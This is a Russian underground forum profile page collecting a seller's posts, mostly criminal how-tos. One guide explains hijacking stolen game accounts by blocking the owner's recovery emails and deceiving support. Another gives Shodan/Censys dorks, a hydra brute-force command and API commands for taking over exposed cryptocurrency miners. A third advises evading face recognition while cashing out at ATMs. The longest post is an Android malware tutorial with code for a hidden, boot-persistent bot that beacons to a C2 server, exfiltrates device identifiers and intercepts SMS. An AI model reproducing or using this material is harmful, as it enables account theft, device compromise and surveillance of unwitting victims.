RabbitRun

Проверенный продавец
  • Публикации

    365
  • Зарегистрирован

  • Посещение

  • Days Won

    12

RabbitRun last won the day on 15 мая 2017

RabbitRun had the most liked content!

О RabbitRun

  • Звание
    Заслуженный тренер

Информация

  • Пол
    Женщина
  • Депозит
    50 000 рублей

Контакты

Посетители профиля

1206 просмотров профиля
  1. Цель Тёмного интернета Целью Даркнета является предоставление полной анонимности с гарантией безопасности, где люди могут виртуально взаимодействовать друг с другом и не бояться закона. Даркнет содержит форумы, блоги информаторов, услуги сводничества одних с другими, онлайн рынки, ресурсы с документацией и т.д. Светлая сторона Тёмного Даркнет выступает убежищем демократии и противодействием коррупции. Здесь информаторы могут сообщать о корпоративных и правительственных неправомерных действиях прессе, без опасений преследования рассекречивать коррупционные действия, которые скрыты от общественности. В этой сети царит полнейшая свобода слова и информации. Даркнет — это также место, где люди из деспотических стран или репрессивных религий могут найти единомышленников и даже получить помощь. И конечно же Даркнет является убежищем для журналистов и людей с весьма нестандартным образом жизни, чтобы общаться в сети и не опасаться репрессий. Тёмная сторона Даркнета У Даркнета есть и темная сторона. Даркнет выступает в роли чёрного рынка, где можно купить или продать что угодно, любую контрабанду, украденную вещь или незаконно добытую информацию. Наркотики, оружие, ворованные номера кредитных карт, различная порнография, услуги по отмыванию денег и даже наем убийц — все это есть в Даркнете. Правда, каждый сам решает для себя, тёмная эта сторона иль нет.
  2. Данный мини курс ориентирован для тех, кто боле менее знаком с таким ремеслом как брут.Я не буду советовать вам места откуда покупать или брать бесплатно базы.Ни будет ни слова про прокси, vpn. Сейчас я бы хотел поведать вам именно о тонкостях и трюках в Бруте, которые помогут вам защитить краденный аккаунт до его продажи, или навсегда, если вас интересует личное использование. Еще стоит подметить что эти советы будет касаться именно игровых аккаунтов. Так как опыта в этой сфере у меня не мало. Но все советы так же подойдут для любых сервисов. Заработок касаемо даже мобильных игр может достигать 150+к в месяц, зависит от ваших усилий. И последнее - конкретики тут не будет, игры или сервисы вы выбираете сами... 1) Допустим мы выбрали сервис для которого и будем добывать аккаунты, для начала создайте свой личный тестовый аккаунт в этом сервисе/игре и тестовую почту, хоть temporary email. Далее наша цель собрать как можно больше электронных адрессов этого сервиса, от которых чекер и будет чекать письма ( https://ibb.co/fTH9jm (не реклама)). Регаемся - пришло письмо с одной почты от сервиса, жмем "забыли пароль", придет еще письмо от уже другого адресса, пишем в саппорт с любой темой - придет третье, хотите оставить фидбек - придет с четвертой. Далее заливаем их в чекер. Если попадается акк не только с письмом о регистрации но и с письмом от саппорта, то аккаунт скорее всего жирный, ибо восстанавливать нулевый аккаунт владельцу было бы лень. Так что если слишком много набрутите акков с деф регистрационным письмом, то скипайте те, которые без письма от сапорта (рискованно). Про дату упоминать не стоит, ибо даже если аккаунту 2 года, он 50/50 нулевый может быть, так что внимания на этот аспект даже не уделяйте (по своему опыту). 2) Получив доступ к почте, не бежим сразу менять пароль, а лишь заходим в сервис/игру и смотрим стоит ли оно чего...(Пояснять как получить доступ к сервису/игре имея только почту думаю не стоит - тупо через восстановление пароля, если пароль от логов не подходит, и не забываем удалять следы). Чтобы ускорить процесс в два раза - одни логи тестим в самом приложении сервиса/игры, другие же на офф сайте (если можно залогиниться). Использование нескольких браузеров строго запрещено, онли тор... 3)Если аккаунт хороший, то смотрим, привязан ли телефон к почте, если нет то выбираете сервис для покупки онлайн номера (навсегда) на ваше усмотрение, бесплатные онлайн номера чаще всегда даются триально на 7 дней но нам надо навсегда!. Я лично покупал за 10 бачей 10 номеров по акциям и они все еще работают (600 руб за все 10 и все на одном аккаунте)...Затраты минимальны. Привязав телефон, вы сможете легко восстановить почту если владелец сменит пароль. Слишком очевидно но все-же. Привязав телефон, меняем пароль от мыла и радуемся. Дальше интересней.... Если же телефон уже привязан, то для начала пробуете сменить почту привязанную к игре. Можно и через саппорт самой игры. Пишем, мол на мыле кто то другой сидит, а возможности сменить пароль нету. Обычно приходят инструкции на почту, так что чекайте и быстро удаляйте...И вуаля, ваш аккаунт который вы собираетесь продавать теперь привязан к левой чистой почте. Если же телефон уже привязан и почту сменить нельзя и доступ к аккаунту идет всегда только по логину и паролю, то заходите на сайт игры/сервиса и запрашиваете смену пароля. Придет сообщение на почту, подтверждаете свой новый пароль, и теперь самое главное перед удалением этого сообщения кидаете его в "спам", а от туда уже удаляете. Ту же операцию проделываете с саппортовским адрессом. Главное чтобы все адресса (которые кстати у нас все еще забиты в чекере) считались как спам. Таким образом, если хозяин попытается восстановить пароль, то ему тупо не будет приходить сообщение о подтвержении на почту... На этот моменте забиваете хер на саму почту и радуетесь новому жирному аккаунту, доступ к которому есть только у вас. 4)Некоторые сервисы/игры, имеющие приложения под android дополнительно привязывают gmail почту к аккаунту, тоесть не только по логам можно зайти в игру, но и по gmail. Так как gmail напрямую связан с системой android и его требуют вводить на каждом углу, так что если вы выясните что у сервиса такая функция работает, то либо меняем данные от gmail плюсом, если же не получится то пишем опять таки в саппорт, и говорим мол только оригинальная почта есть и логи, а gmail украли, и боюсь что зайдут на аккаунт через него..Далее думаю понятно. В заключение хочу добавить, что все сервисы, почтовики, игры о которых тут шла речь - забугорные, так как у меня английском на высоком уровне, поэтому если я тут упоминал про саппорт, то писать там на англ лучше, они лояльнее там..Тоже самое касается сервисов для покупки онлайн номеров...Но тут кому как нравится. Все тоже самое для СНГ тоже подойдет. Надеюсь инфа была полезная.
  3. Алиса Шевченко «взламывает» компьютерные системы крупных компаний по их заказу и зарабатывает около 10 млн рублей в год. Зачем компании ей платят? Давайте разберемся. Взлом умного города В фабричных окнах загорается свет. Локомотив тянет вагоны через железнодорожный переезд. Кран поднимает грузы. Миниатюрный городок, появившийся в мае этого года в московском техноцентре Digital October, - не игрушка, а хакерский полигон, построенный для форума Positive Hack Days. За сотню километров от этого места, сидя в подмосковном коттедже, блондинка с татуировкой-иероглифом на левом предплечье взламывает со своего компьютера систему управления предприятием городка-полигона. Она побеждает в конкурсе «Взлом умного города» - легальной хакерской атаке, нацеленной на выявление слабых мест в инфраструктурных и промышленных системах. «Я даже не ожидала такой тривиальности - около 10 критических уязвимостей всего за пару часов», - рассказывает Алиса Шевченко, она же Esage, она же владелица компании «Цифровое оружие и защита» с годовой выручкой около 10 млн рублей. История В 15 лет Алиса выучила язык ассемблера, но программистом не стала - ее больше интересовали взломы. Бросила учебу в трех технических вузах, посчитав, что попусту теряет время, а сейчас ее приглашают читать лекции на кафедру защиты информации МГУ и спецфакультет МГТУ им. Баумана. Свою первую компанию EsageLab, специализирующуюся на цифровой защите, Алиса Шевченко открыла в 2009 году. «Ей всегда было интересно узнать и понять, как все устроено изнутри. А потом использовать эти знания, для того чтобы обойти систему», - вспоминает Александр Гостев, главный антивирусный эксперт «Лаборатории Касперского», где Шевченко пять лет работала вирусным аналитиком. Расследуя кражу денег в одном из российских банков, вспоминает Гостев, он показал Шевченко выявленный руткит-модуль (программу, которая в обход антивирусов скрытно управляет компьютером). Для Алисы - Esage руткиты были профессиональной страстью, и она вспомнила, что уже видела похожий. В итоге взломщик был обнаружен. А Шевченко почувствовала, что на противодействии киберпреступникам можно заработать: «Документы, которые раньше прятали в сейфах, переместились в компьютеры, на смену кешу приходил интернет-банкинг, и криминал двигался к тому, чтобы захватывать цифровые активы». Развитие В начале 2000-х в России рынка тестирования проникновений и поиска уязвимостей практически не было, он появился к 2010 году, замечает Александр Поляков, технический директор из питерской компании Digital Security. На целевых атаках зарабатывали прежде всего хакеры-преступники, охотившиеся за деньгами или промышленными секретами. Поначалу бизнес EsageLab был связан с консалтингом и исследованиями целевых атак. Стартовых инвестиций не понадобилось: весь капитал заключался в навыках нескольких проверенных сотрудников и собственных компьютерах. Алиса Шевченко Первых крупных заказчиков EsageLab получила по рекомендации системного интегратора «ДиалогНаука», с руководством которого Шевченко была знакома. К примеру, в 2010 году один из российских банков обратился в EsageLab, чтобы разобраться, как с помощью сотен поддельных денежных переводов кибермошенники выводили суммы от $3000 до $30 000. Группа Шевченко нашла бреши, через которые атакующие внедрились в систему банка и могли бы вновь это сделать в любой момент. Такие расследования, которые показывали логику и сценарий атаки, занимали у EsageLab в среднем месяц работы и приносили $10 000–15 000 выручки. Гендиректор «ДиалогНаука» Виктор Сердюк подтвердил Forbes факт сотрудничества с Шевченко, но раскрывать подробности не стал, сославшись на конфиденциальность информации. Судя по списку выигранных контрактов, клиентами интегратора были: Суды Минобороны Структуры ФСО Аппарат Госдумы "Сбербанк" "Газпром" "Транснефть" "МТС" "Мегафон" Партнерство «ДиалогНаука» с EsageLab было вполне логичным, замечает руководитель Group-IB Илья Сачков: Для интеграторов поиск уязвимостей - это подготовка дальнейших поставок клиентам софта и оборудования. Шевченко и "Лаборатория Касперского" В 2009 году Алиса Шевченко, по ее словам, получила от заказчиков 1,5 млн рублей. Обратился к ней и бывший работодатель. EsageLab тестировала один из антивирусов KasperskyLab. «Поработали хорошо, нашли много уязвимостей», - вспоминает предпринимательница. Однако бизнес оказался не столь привлекателен, как казалось вначале: контракты на расследования и тестирования разовые, накладные расходы велики, команду надо постоянно держать в Москве. Шевченко решила сосредоточиться на том, что у нее получалось лучше всего, - на взломах-проверках. Так можно было заполучить клиентов на длительное обслуживание. В поисках новых вариантов партнерства Шевченко переговорила с Натальей Касперской. К тому времени соосновательница «Лаборатории Касперского» вышла из бизнеса бывшего мужа и развивала свою компанию InfoWatch. «Алиса занималась консультациями в области защиты от руткитов. Было непонятно, как на этом можно было заработать. Инвестировать мы не стали, но какими-то советами помогли», — вспоминает Касперская. Боевые учения Владелице EsageLab нужно было около $150 000 на создание программного инструментария для управляемых взломов. За год с лишним она заработала недостающую сумму. В 2011 году Шевченко заключила первый контракт по поиску уязвимостей в ПО для компании «ИнформЗащита». А в следующем году - первый контракт по пентестам (испытаниям на проникновение) с Parallels. Поиск и ликвидация слабых мест в компьютерной системе через имитацию хакерских атак за рубежом называется offensive security (агрессивная защита информации), в России - «боевые учения». Команда Шевченко знает лишь название компании-клиента и по открытым источникам собирает информацию на ключевых сотрудников, как при подготовке к реальному киберпреступлению (например, через компьютер сисадмина можно проникнуть в критические узлы локальной сети). Дальнейшие действия - информация, не подлежащая разглашению. Схема "боевых учений" «Мы всегда работаем по контракту с предоплатой. За штучные заказы уже не беремся», — говорит Шевченко. Почему заказчики «боевых учений» привлекают людей со стороны? «Держать таких специалистов в штате накладно, ведь пентесты делаются не каждый день», — объясняет вице-президент по безопасности банка «Тинькофф Кредитные системы» Станислав Павлунин (в 2013 году банк привлекал Шевченко для аудита кода и пентеста). Даже если у фирмы есть свой отдел реагирования на целевые атаки, возникает потребность проверить, насколько надежна защита, то есть провести внешний аудит. Поиском уязвимостей, по словам Ильи Сачкова из Group-IB, в России сейчас занимаются не менее 30 больших компаний, преимущество Шевченко = в ее «бутиковости» и соответствующем качестве проверки. «Я никудышный продавец, - признается Алиса. - В компании на мне лежит исследовательская задача - получение инновационных технологий». Впрочем, клиенты, как правило, находят ее сами. Заказчики проверяют хакеров, а хакеры - заказчиков. «По одному контракту переговоры шли почти год, пока мы не стали доверять друг другу, - рассказывает Шевченко. - Мы используем дорогие технологии стоимостью $100 000–200 000, и они не должны попасть в руки к кому попало». Ребрендинг Год тому назад EsageLab была переименована в «Цифровое оружие и защиту» (ЦОР). Это не просто эффектное название: в декабре 2013 года технологии вторжения в программное обеспечение (intrusion software), которые создает и использует группа Шевченко, были внесены в реестр международного Вассенаарского соглашения, регулирующего экспорт обычных вооружений. Алиса Шевченко выходит на зарубежные рынки. Скоро в Сингапуре должна начать работу ее новая компания, которая будет продавать программное обеспечение для проведения реалистичных тестов на проникновение. Насколько успешен легальный хакерский бизнес? По словам Шевченко: Выручка EsageLab в 2012 году составляла 3 млн рублей «Цифровое оружие и защита» по итогам 2014 года должна заработать около 10 млн рублей. На аренду офиса ЦОР не тратится, сотрудники работают дистанционно, ядро компании - пять человек, в зависимости от задач команда увеличивается до 10-15 человек. Штатных сотрудников Шевченко отбирала долго и тщательно. Еще до «Лаборатории Касперского» она тусовалась на хакерских сайтах под ником codera. Из числа знакомых по сообществам - хакеров из Санкт-Петербурга и Новосибирска, не связавшихся с криминалом, - она и стала собирать команду. «Это мои лучшие специалисты, проверенные годами», - уверяет Шевченко. На вопрос о возможности проверки на полиграфе она пожимает плечами: «Хакеры знают, как его обойти. «Детектор лжи» мне часто заменяет женская интуиция».
  4. Apple утверждает, что ее система блокировки Face ID очень надежная. Но мы уже знаем, что отличить близнецов друг от друга она не способна. А теперь оказалось, что даже просто братья могут разблокировать iPhone X. На видео ниже показано, как парень разблокирует свой iPhone X, а потом передает телефон своему брату. Сначала смартфон остается заблокированным, но когда брат надевает очки, то получает доступ к телефону. Если вы не доверяете своим братьям и сестрам, то лучше пока обойтись обычным паролем на iPhone X.
  5. Примечание: Все методы расписанные ниже, можете использовать на свой страх и риск. Open Source Intelligence(OSINT) Это один из первых способов сбора информации до атаки. В прошлом было много случаев взлома при помощи OSINT. Вместе с развитием устройств передачи информации, мы можем собрать огромный объем важных данных в общедоступной сети. В этой статье, мы будем собирать данные для майнеров криптовалют (Биткоин[Antminer] и Эфир[Claymore]). Прощупываем Antminer! Самый лучший ASIC биткоин майнер это Antminer S9/S7. Аппаратное обеспечение майнера использует веб-сервер “lighttpd/1.4.32 и некоторые имеют открытые SSH порты. Существует эксплоит для версии“Lighttpd 1.4.31”, однако, вы не сможете получить доступ к серверу с данным эксплоитом. Веб-страница на веб-сервере защищена «HTTP Аутентификацией Дайджест». Критической точкой является то, что шахтерам требуется имя пользователя и пароль для входа в систему.Критическая суть в том, что майнеру требуется имя пользователя и пароль для входа в систему. На странице конфигурации antMiner используется «Аутентификация Дайджест» Известно сто нам нужно информация или ключевики(ключевые слова) чтобы собрать данные при помощи технологии OSINT. Эта информация является ключевым словом, включая «antMiner Конфигурации» в заголовках HTTP, которые появляются каждый раз, когда я отправляю запрос на сервер. Я искал на censys.io и на shodan.io при помощи особых дорков и собрал IP-адреса. (antminer) AND protocols.raw: “80/http” AND 80.http.get.title: “401” https://censys.io/ дорки поиска Доступ к системе можно получить при помощи брутфорс атаки на HTTP порт или на SSH порт. Сперва мне понадобилось руководство пользователя чтобы узнать HTTP имя пользователя и пароль по умолчанию. После я поискал в гугле по ключевым словам на английском “antminer default password” и нашел сайт в который содержал в себе Руководство для пользователя. Руководство для пользователя AntMiner | Мы можем с лёгкостью найти в поисковике Для данного мануала , я предпочел использовать hydra для брутфорс атаки (Bruteforcing HTTP Digest Authentication- Брутфорс HTTP аутенсификации дайджест) с открытыми наиболее популярными распространёнными 10 000 паролями. Также можно использовать Burp Suite Intruder hydra -l root -P commonPasswords.txt -vV {TARGET} http-get / Если тебе посчастливилось получить доступ на страницу конфигурации. Злоумышленники могут редактировать страницу по своему желанию. Программное обеспечение майнера Claymore Другой тип атаки также нацелен на программное обеспечение майнера Claymore Miner (например, Altcoins, ethereum, майнер zcash) Я совершил другой поиск в shodan.io с помощью конкретных дорков. Можете отправить несколько пакетов JSON (JavaScript Object Notation— текстовый формат обмена данными) с помощью API-интерфейса Claymore Remote Manager для удаленного управления сервером майнера. Тут мы, управляем графическими процессорами (отключаем, включаем сдвоенный режим и т.д) или же редактируем config.txt чтобы изменить пул адреса кошелька отправив несколько команд. Мы отправим команду “miner_restart” или “control_gpu” чтобы определить является ли он в режиме только для чтения или записи/чтения. Я использовал NC для отправки JSON команды на MacOS. Сперва, мы попытаемся выполнить команду с "miner_getstat1" После этого мы попытаемся отправить команду с“control_gpu” чтобы определить является ли он в режиме только для чтения или записи/чтения. Мы получили сообщение об ошибке с кодом указанным ниже. Мне удалось перезапустить систему, когда использовал другой IP-адрес. Тут показало, что Claymоre Remоte Mаnаger API позволяет чтение / запись аутентификацию. Claymore Remote Manager также позволяет редактировать файл конфигурации с использованием формата JSON (отправив JSON -файл). Тем не менее, вы можете с лёгкостью отредактировать его с помощью Claymore's Ethereum Dual Miner Manager в Windows, также можете изменить пул адрес кошелька. Фантази для взлома: Я не пробовал ввести команду в Claymore Майнер Софт с отправкой команды JSON. Если у него есть уязвимость, можно получить доступу к серверу без разрешения чтения/записи . Можете улучшить методы поиска с помощью OSINT для сбора массивных данных. Можете даже повредить все графические процессоры контролируя охладительной системой после редактирования config.txt :)
  6. Кремль раскрыл поручения ЦБ и правительству по регулированию криптовалют. Две недели назад президент России Владимир Путин обсуждал эту тему с министром финансов Антоном Силуановым, своим помощником Андреем Белоусовым, председателем ЦБ Эльвирой Набиуллиной, и после этого совещания стало понятно, что криптовалютам быть, но государство возьмет под контроль их выпуск и обращение в России. По итогам совещания Путин дал несколько поручений, говорится на сайте Кремля. До 1 июля 2018 г. правительство и ЦБ должны описать в законодательстве статус криптовалют, технологии распределенных реестров (блокчейн), а также токена и смарт-контракта. Также им предстоит выработать требования к «майнингу» криптовалют – причем майнерам предстоит регистрация. Еще их обложат налогом, но каким – пока неизвестно. Также президент поручил отрегулировать ICO (initial coin offering – первичное размещение криптовалют), взяв за основу практику IPO – первичного размещения ценных бумаг. Схожих позиций придерживаются и американские регуляторы. В июле американская комиссия по ценным бумагам и биржам признала токены (собственная криптовалюта проекта, которую он предлагает в обмен на инвестиции) проекта The DAO ценными бумагами, а значит, их выпуск должен сопровождаться соответствующими процедурами – например, допуском к ICO только квалифицированных инвесторов и регистрацией. Но одновременно президент поручил обдумать и механизмы тестирования этих новинок. До 20 декабря ЦБ должен создать специальную «песочницу» для их апробации, до тех пор пока не появится регулирование их оборота на финансовом рынке. Страны Евразийского экономического союза ждет единое платежное пространство, где будут применяться эти новые финансовые технологии, говорится в поручении президента. ЦБ и правительство должны продумать это до 30 марта 2018 г. Поручения президента касаются законодательного регулирования, а техническая сторона вопроса, судя по словам министра связи и массовых коммуникаций Николая Никифорова, уже проработана его ведомством. На прошлой неделе он анонсировал подготовленное Минкомсвязи постановление правительства с описанием технологий. «Должен быть установлен госконтроль за эмиссией этого криптоинструмента, а экосистема, применение – за частным бизнесом. Важно понять, в каких отраслях и сферах он может применяться и быть полезен», – сказал Никифоров. Признавать остальные криптовалюты Россия не планирует, говорит он: «Биткойн и другие криптовалюты основаны на зарубежной криптографии, и под ними нет никакой правовой основы». Криптовалюта (самая известная из них – биткойн) – это программный код, который не регулируется ни одним банковским надзорным органом в мире и не имеет эмиссионного центра. Создают код или добывают условный ограниченный ресурс сами пользователи за счет вычислительной мощности компьютера. Криптовалюту можно добыть самостоятельно или купить на зарубежных торговых площадках.
  7. Прочитав данную новость меня навело на большие раздумия. Банк тинькоф внедряет умную технологию распознавания лиц на своих банкоматах, что делает обнал в банкоматах тинькофф совсем не логичным. Да и действитетельно, сейчас технологии идут в ногу со временем, распознавание лиц сейчас работает в пилотной версии, но я даю буквально год, два и анализ можно будет выстроить быстро. Давайте разберем способы обхода данной проблемы. Да и не суть что все вокруг преступники, но в целом, если идем на сомнительную встречу с сомнительным человеком, зачем нам светить везде свое прекрасное личко? Давайте сначала разберемся как это работает? Определение заточено на цвете кожи, симметрии при помощи нейросетей. Существует метод Виолы-Джонса, который может применяться в реальном времени, система распознает лицо даже при поворотах. Для анализа в публичных местах используются 3D изображения, несколько камер делают снимки с разных ракурсов и потом обьединяют все в одно целое, формируется трехмерная модель, определяя контрольные точки, и в последствии данные анализируются с базой данных и при совпадении, человек идентифицируется. На фото ниже, представлены параметры по которым идет идентификация. В наше время эта технология еще сырая, можно рассмотреть тот момент, что компания Identix разрабатывает технологию, которая будет анализировать текстуру, шрамы, поры и глубину пор. Так что через несклько лет этот вопрос будет уже широко рассматриватся и применятся во всех публичных и не публичных местах. Определение схожести пропорций и цвета кожи, выделение контуров на изображении и их сопоставление с контурами лиц, выделение симметрий при помощи нейросетей. Ребята из Яндекса проводили эксперемент, который способствует защититься от распознавания лиц, были проведены тесты с нанесением макияжа и всевозможных рисунков на лицо. Вероятность идентификации достигает 70% Самый верный и старый способ, который поможет обмануть нейронную сеть, является зимняя шапка/кепка, головной убор, побольше + для надежности очки. Тем самым нейронная сеть не сможет вас идентифицировать. Не стоит недооценивать эти 2 элемента, можете проверить себя на публичных ресурсах такие как FindFace а так же зарубежных. Для более серьезных дел, конечно тут на помощь придут реалистичные силиконовые маски, стоят они правда дорого, но любая идентификация составит 0%
  8. Да тут особо ни чего мудрить не надо. Просто идем по шагам. 1. Устанавливаем java для разработчиков с офф сайта. 2. Качаем android studioКачаем полную рекомендованную. Сейчас мы не будем вдаваться в эти все подробности. Оно нам надо? 3. Запасаемся бубликами и пивом. Ведь сейчас придется все это поставить и настроить. 4. Тыкаем в основном далее, не вдумываясь что там написано. Незачем забивать голову ? 5. После чего как мы установили все это. Запускаем студию. Ищем сверху значок SDK Manager. Он где-то справа. Нажимаем, ставим везде галки, соглашаемся с условиями и нажимаем инсталл. 6. Опять грызем бублики и пьем великолепное пиво. Тут процесс по дольше, так как будут выкачиваться виртуалки и всяческие тулзы. 7. Ну вот собственно и все. Как все начиналось? Мы все поставили, теперь стоит и подумать, а как тут теперь вирус написать ? А для этого мы идем в File -> New -> New project. И тут нам предлагают придумать название проекта и домен сайта компании. Вводим что взбредёт в голову. На основе этих данных генерируется package имя. Которое используется как уникальный идентификатор нашего APK. Жмем далее. Тут нам предлагают выбрать платформу под наш проект. Ну тут мы выбираем только Phone. Остальное рассмотрим позже. Далее. И теперь нам предлагают выбрать как будет выглядеть наше окошечко (Activity) стартовое, главное. Тут есть важная особенность. Чтобы запустить какой либо код сразу после установки, нужно чтобы было какой либо из окошек при старте. Поэтому выбираем любое кроме No Activity. Лучше всего выбрать Empty. Будет легче его вычищать, от ненужного мусора. Далее. Пишем название окошку и нажимаем Finish. Будет немного времени , чтобы бахнуть еще пивка. Пока файлы нового проекта индексируются и настраивается сборщик проекта. Эй, ты слишком жирный! Пробуем собрать проект наш. Build -> Generate signed apk.. И что мы видим? APK с 1 окошком и приложением которое ни чего не делает. Занимает 1 мегабайт. Надо с этим что-то делать, а именно отказывать от библиотек (AppCompat). Это красивая графика, которая нам не нужна. Переходи в файл MainActivity.java Заменяем public class MainActivity extends AppCompatActivity на public class MainActivity extends Activity Удаляем import android.support.v7.app.AppCompatActivity; Заходим в настройки проекта и во вкладке Dependes удаляем строку с AppCompat. Далее переходим к файлу values.xml и styles.xml. Удаляем их. Заходим в androidManifest.xml и меняем android:theme="@style/AppTheme" на android:theme="@android:style/Theme.Translucent.NoTitleBar" Собираем наше приложение, ура! размер меньше 40 кб. Уже есть с чем работать. Почему ты не прячешься? Далее, нам нужно спрятать нашего зверька. Чтобы иконка не была видна в списке менеджера приложений. А так же надо закрыть наше приложение. Вставляем после setContentView(R.layout.activity_main) Следующий код: String pgkname = getApplicationContext().getPackageName(); ComponentName componentToDisable = new ComponentName(pgkname,pgkname+".MainActivity"); getApplicationContext().getPackageManager().setComponentEnabledSetting( componentToDisable, PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP); Этот код скроет нашу иконку с глаз И после всего этого пишем: finish(); Теперь наше приложение после установки. Запускается и сразу же скрывается с глаз долой. Ух, проделали мы работу. Но надо идти дальше, а то бот не появиться в админке. Тук, тук, открывайте, полиция! Теперь мы должны сделать так, чтобы наш чудесный APK начал стучать в админку. Тут я уже полагаю, что админка где-то написана. И от нас требуется только стучать. Возьмем самый простой метод, он не будет работать корректно на андроидах выше 4.х. Но с чего-то надо же учиться. Я же не за вас работу делаю. Нам нужно создать сервис. Для этого мы создаем файл с новым class. (Правой тыкаем в проекте, на папку Java). Название класса пишем к примеру Network. Нажимаем окей. Удаляем все содержимое файла кроме первой строки где прописан package и заменяем на import android.app.Service; import android.content.Intent; import android.os.IBinder; import org.apache.http.HttpResponse; import org.apache.http.client.HttpClient; import org.apache.http.client.methods.HttpGet; import org.apache.http.client.methods.HttpPost; import org.apache.http.entity.StringEntity; import org.apache.http.impl.client.DefaultHttpClient; import java.io.InputStream; import java.util.Timer; import java.util.TimerTask; public class Network extends Service{ @Override public int onStartCommand(Intent intent, int flags, int startId) { return Service.START_STICKY; } @Override public IBinder onBind(Intent intent) { throw new UnsupportedOperationException(""); } @Override public void onCreate() { MyTimerTask myTask = new MyTimerTask(); Timer myTimer = new Timer(); myTimer.schedule(myTask, 10000, 10000); } class MyTimerTask extends TimerTask { public void run() { String result = ""; result = GET("http://site.ru/?q="); // Обработка result } } public String GET(String url){ InputStream inputStream = null; String result = ""; try { HttpClient httpclient = new DefaultHttpClient(); HttpResponse httpResponse = httpclient.execute(new HttpGet(url)); inputStream = httpResponse.getEntity().getContent(); if(inputStream != null) result = convertInputStreamToString(inputStream); else result = ""; } catch (Exception e) { } return result; } } Это код описывает класс сервиса, в котором при запуске, запускает таймер и каждые 10 секунд отправляет GET запрос наURL и запрашивает ответ. Но это не все. Этот код не будет работать если мы объявим наш сервис в манифесте и не дадим права выходить в интернет нашему приложению. Идем в манифест. Добавляем <uses-permission android:name="android.permission.INTERNET" /> и в описание application <service android:name=".Network" /> Осталось запустить наш сервис. Идем в MainActivity и перед finish() вставляем запуск сервиса getApplicationContext().startService(new Intent(getApplicationContext(), Network.class)); Финишная линия Теперь у нас есть апк, который сам себя скрывает после запуска и запускает процесс отстука в админ панель. Где написано // Обработка result : там происходит обработка ответа и команд админки. Не сложно, правда? Но пока мы пили пиво. Мы совсем забыли, что если телефон перезагрузят. То наше приложение уже ни когда не запустится. Для этого мы идем опять в манифест. Добавляем права на запуск после ребута: <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> Добавляем обязательно обработчик в описание application <receiver android:name=".Boot" android:enabled="true" > <intent-filter> <action android:name="android.intent.action.BOOT_COMPLETED" /> <action android:name="android.intent.action.QUICKBOOT_POWERON" /> </intent-filter> </receiver> Теперь после перезапуска у нас вызовется класс Boot. И сейчас мы его создадим. Все делаем как я писал выше. Создали и удалили все кроме package. import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; public class Boot extends BroadcastReceiver { @Override public void onReceive(Context context, Intent arg1) { context.startService(new Intent(context, Network.class)); } } Конец, и пару слов. В окончании у нас появился прям такой игрушечный бот (APK). ********* Гейт – это скрипт который будет принимать, отдавать команды. К примеру админка у нас стоит на http://site.ru/. Создаем скрипт gate.php. И кладём его в корень. Получаем наш гейт http://site.ru/gate.php. Важно: нельзя использовать слова gate и слова-маячки. Трафик может снифаться. Этот скрипт будет принимать и отдавать команды. Самый верный способ – это отправка данных методом post и чтение вывода. Получаем простую цепочку: 1. Определяем гейт. 2. Шлем отстук. 3. Забираем задачи, что гейт нам даст в ответ. (Лучше всего задачи забирать по одной, так как нам важно время обработки команд и память которыю мы используем на телефоне. Ведь там не как на компе, гигабайты ее. А java она все таки местами прожорливая.) 4. Шаг не всегда отрабатывает, так как не всегда нам нужно слать отчет о выполнении команд. Но если все таки надо. То мы это делаем 2м пунктом, но с определенным флагом. Почему post? Чтобы в логах не было ничего кроме имени гейта. А что слать то? В отстук входят все основные параметры такие как imei, версия os, sdk, различные параметры пользователя. Кстати если вы не знаете как генерировать bot id, то imei будет в самый раз, чтобы различать всех ботов. Так как это уникальный параметр телефона. Все что вы считаете нужным, отсылаете, а ответ обрабатываете. Список параметров рекомендуемый для отстука: 1. imei (id бота) 2. оператор 3. версия os 4. версия sdk(для разграничения функционала, так как до 4.4 и после разные методы работы используются) 5. модель телефона 6. серийный номер 7. есть ли рут (использовать расширенный функционал и консоль устройства) 8. версия билда (по этому параметру можно обновлять старые версии) 9. Номер телефона 10. Другие параметры важные вам Формат запросов, самый удобный на мой взгляд это json. Но мы живем в 21м веке и этого мало. Это все надо шифровать еще. Почему json? Его очень легко обрабатывать и на стороне сервера и на стороне клиента.Далее мы накладываем алгоритм шифрования. Самый простой это будет RC4, хотя их много, как говорится, на вкус и цвет товарища нет. Но тут мы столкнемся с одной проблемой, у нас могут появитсья всякого рода спец символы, с которыми возникнут сложности при передаче и декодировании. Выходом является обёртка из base64. Алгоритм получается следующий: 1. Составляем json 2. Шифруем его RC4 или любым другим алгоритмом. 3. Оформляем в base64 4. Отправляем 5. Читаем вывод гейта. 6. Делаем все в обратном порядке. Снимаем base64 , расшифровываем, разбираем json. Если надо отрабатываем определенные действия. Важный момент, что при обработке результата, нужно проверять, а действительно ли это админка. То есть должны быть специфичные сигнатуры ответа. Если их нет. То перестаем туда стучать. Так же стоит учитывать, что на телефоне время отстука может чуток отличаться, я имею ввиду интервалы. Все это из-за специфичной работы сервисов на телефоне. Поэтому стоит брать время ожидания с запасом, для определения онлайн бот или нет. Праздники прошли, все протрезвели. Пора и за работу. Как только мы написали своего зверя, нам сразу же захотелось посмотреть фоточки и переписочки людей. И сегодня пойдет речь о том как это сделать. Сразу скажу, что этот вопрос очень сложный и мы к нему ещё не раз вернемся в следующих статьях. Мы рассмотрим здесь перехват и удаление смс для версий 2.х и просто чтение для версий старше 2.Х Почему я решил так сделать? Просто с появлением версии 4.4 работа с смс (удаление или редактирование) изменилась. Создатели поняли, что не стоит кому попало давать работать с входящими данными. Ну в общем поехали. Берем чипсы и пиво. И начинаем разбор. Обработка входящих соединений public class SMSMonitor extends BroadcastReceiver{ @Override public void onReceive(Context context, Intent intent) { Sms sms = new Sms(); try { if (bundle != null) { Object[] pdus = (Object[]) bundle.get(Config.szPdus); SmsMessage[] mgs=new SmsMessage[pdus.length]; for(int i=0;i<pdus.length;i++) { mgs=SmsMessage.createFromPdu((byte[]) pdus); } sms.Text = getMessageFromSMSs(mgs); sms.SenderId = mgs[0].getOriginatingAddress(); Date receiveDate = new Date(mgs[0].getTimestampMillis()); sms.RecieveDate = receiveDate; sms.Status = mgs[0].getStatus(); } } catch (Exception e) { } // можете фильтровать здесь запросы от номеров. Intent intent1 = new Intent(context, SMSService.class); // подготовка Запуска сервиса обработки сообщения. intent1.putExtra("phone", sms.SenderId); 